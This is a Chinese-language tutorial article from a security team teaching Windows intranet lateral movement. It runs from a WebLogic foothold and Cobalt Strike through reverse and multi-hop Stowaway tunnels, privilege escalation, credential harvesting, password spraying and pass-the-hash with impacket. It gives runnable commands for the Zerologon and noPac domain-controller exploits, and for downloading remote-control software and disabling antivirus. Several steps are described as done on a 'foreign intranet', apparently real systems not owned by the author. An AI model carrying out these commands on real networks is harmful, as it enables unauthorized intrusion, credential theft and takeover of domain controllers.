一文学会内网横向

原文链接: https://mp.weixin.qq.com/s?__biz=MzkzNzQyMDkxMQ==&mid=2247488245&idx=1&sn=9870902df836c374181d4f7e57312cac

一文学会内网横向

赤弋安全团队 2025-07-03 08:35

前言

本文以国外内网环境与本地内网靶机环境来进行
window横向教学。

1、获取权限

这里通过weblogic漏洞获取shell权限

一文学会内网横向

先上线cs进行控制,可以通过远程下载exe上线,或者web投递上线

一文学会内网横向

使用web投递上线

一文学会内网横向

一文学会内网横向

2、隧道搭建

根据目标是否出网可使用不同的隧道,出网可用反向隧道,不出网可用正向隧道。

2.1反向隧道(国外内网演示)

可以使用frp,nps,
Stowaway等工具,这里以
Stowaway工具演示

服务端a执行命令./
linux_x64_admin -l 5555 -s 7777

一文学会内网横向

被控端b上传
windows_x64_agent.exe,执行命令

windows_x64_agent.exe -c 192.168.21.128:5555 -s 7777 –reconnect 10,-c为服务端的ip与端口,-s与服务端相同

一文学会内网横向

服务端收到请求

一文学会内网横向

连接节点,设置socks端口

一文学会内网横向

使用
Proxifier连接隧道

一文学会内网横向

配置代理规则即可

一文学会内网横向

2.1.1 多级代理(
本地内网靶机演示)

环境:网段 192.168.2.x    192.168.3.x   192.168.21.x

192.168.21.x模拟外网网段

工具:
Stowaway

服务端a启动(
192.168.21.x)

一文学会内网横向

被控机b连接(
192.168.2.x,
192.168.21.x)

一文学会内网横向

服务端收到连接

一文学会内网横向

use 0

socks 7788

成功搭好被控机b网段的隧道

一文学会内网横向

(被控机b网段)

一文学会内网横向

(被控机c网段)这台服务器只有192.168.2x,192.168.3.x,现在搭建隧道连接到192.168.21.x

一文学会内网横向

在服务端a
执行命令

use 0

listen

输入1

输入监听端口7732

一文学会内网横向

被控机c执行命令,
192.168.2.11为被控机b的ip,

-s为密钥,要与服务端a一致

一文学会内网横向

服务端a执行命令

back

detail

use 1 

socks 6677 

再次设置代理服务器, 以及代理规则,此时多级隧道已搭好

一文学会内网横向

2.2正向隧道(本地内网靶机演示)

正向隧道可以用sou5,
neoreg


sou5演示,目标服务器上传sou5代码

一文学会内网横向

本机连接目标的sou5文件,再通过
Proxifier连接隧道

一文学会内网横向

3、权限提升

国外内网演示)

以国外的服务器演示,实际中administrator权限已经可以不用提了,权限够用了。

一文学会内网横向

可直接通过cs插件进行提权,进程注入,令牌窃取等

一文学会内网横向

也可以上传土豆工具进行提权

一文学会内网横向

以插件进行演示

一文学会内网横向

一文学会内网横向

再以system权限上线cs

一文学会内网横向

一文学会内网横向

也可通过cs查看进程,挑选高权限的进行
令牌注入,进程窃取

一文学会内网横向

4、信息收集(国外内网演示)

通过命令获取一些基本信息

ipconfig          查看ip
arp -a            查看路由表
systeminfo        查看系统信息
type C:\Windows\System32\drivers\etc\hosts    查看host,有没有其他网段
net time /domain    查看当前域
net view /domain    查看当前域
nltest /domain_trusts  判断单域多域
setspn -q */*       查看域spn信息
net group "Domain Computers" /domain  查看域组成员

(可以翻一翻服务器的配置文件,看看有没有数据库账号密码,如果服务器有浏览器,xshell,todesk等软件,也可以使用工具收集密码,例如使用
Pillager,
searchall等)

arp -a查看路由表

一文学会内网横向

通过net time /domain,得知域控信息

一文学会内网横向

ping一下域控获取域控ip地址

一文学会内网横向

5、横向移动

5.1内网扫描(
本地内网靶机演示)

可以使用工具fscan,
Template,qscan等

连上隧道直接开扫即可

一文学会内网横向

存在永恒之蓝,直接用cs插件攻击

一文学会内网横向

一文学会内网横向

5.2密码喷洒(国外内网演示)

通过cs抓取密码

一文学会内网横向

一文学会内网横向

net user /domain,查看域用户名信息

一文学会内网横向

将密码和用户名写成字典进行密码喷洒,可以使用
nxc,CrackMapExec工具进行密码喷洒,
其中CrackMapExec在kali上自带。

nxc工具可以使用不同的协议进行喷洒

一文学会内网横向

以nxc演示,将抓取到的用户名和hash密码保存txt进行喷洒,这里使用的是smb,也可以使用其他协议进行喷洒

nxc.exe smb 192.168.2.21/24 -u user.txt -H pass.txt

一文学会内网横向

使用
impacket工具,获取192.168.2.5域控权限,

python smbexec.py -hashes :哈希密码 域名/账号@ip

或者:python smbexec.py 
域名/账号:明文密码@ip,

例如
python smbexec.py sqlserver/administrator:[email protected]

一文学会内网横向

5.3漏洞横向(本地内网靶机演示)

5.3.1 CVE-2020-0688

前提条件:开启了exchang服务

通过spn扫描可知开启了
exchang服务

0day.org为域名

命令:powershell setspn -T 0day.org -q 
/

一文学会内网横向

ping计算机名获取ip地址

一文学会内网横向

[email protected],域用户@域名,密码通过
Mimikatz抓取

一文学会内网横向

5.3.2 CVE-2020-1472

影响版本:WIN2008-2019

,只能打域

获取计算机名,net group “domain controllers” /domain

或者net time /domain

一文学会内网横向

连接DC清空凭证:

OWA2010CN-GOD为域控地址,

3.21为域控ip

python cve-2020-1472-exploit.py OWA2010CN-GOD 192.168.3.21

一文学会内网横向

获取域内HASH(使用空密码连接):

使用imp套件工具

“域控/主机名@域控ip”

python secretsdump.py “god.org/[email protected]” -no-pass

一文学会内网横向

将内容复制出来,使用刚才回显的哈希密码连接

一文学会内网横向

python wmiexec.py -hashes :ccef208c6485269c20db2cad21734fe7 god/[email protected]

一文学会内网横向

5.3.2 CVE-2021-42287

前提条件:一个域内普通账号(需要明文密码),相对于刚才的漏洞多了一个条件

影响版本:Windows基本全系列

只能打域


先通过提权抓取明文密码

god.org/webadmin:admin!@#45(域名/获取到的域用户账号/域用户密码) 192.168.3.21为目标ip

python.exe scanner.py -use-ldap “god.org/webadmin:admin!@#45” -dc-ip 192.168.3.21

一文学会内网横向

再执行命令,成功获取权限

python.exe noPac.py -use-ldap “god.org/webadmin:admin!@#45” -dc-ip 192.168.3.21 -shell

一文学会内网横向

6、补充

远控工具可以使用rustdesk,gotohttp,通过远程连接到桌面,关闭杀软也可以的。

以国外服务器演示,这台服务器存在df杀软

一文学会内网横向

一文学会内网横向

可通过命令远程下载gotohttp后运行

一文学会内网横向

一文学会内网横向

运行后生成
gotohttp.ini,查看
文件信息,直接连接即可

一文学会内网横向

一文学会内网横向

通过命令新增用户,远程登录的时候使用

一文学会内网横向

成功登录后,这时候就可以手动把df关了

一文学会内网横向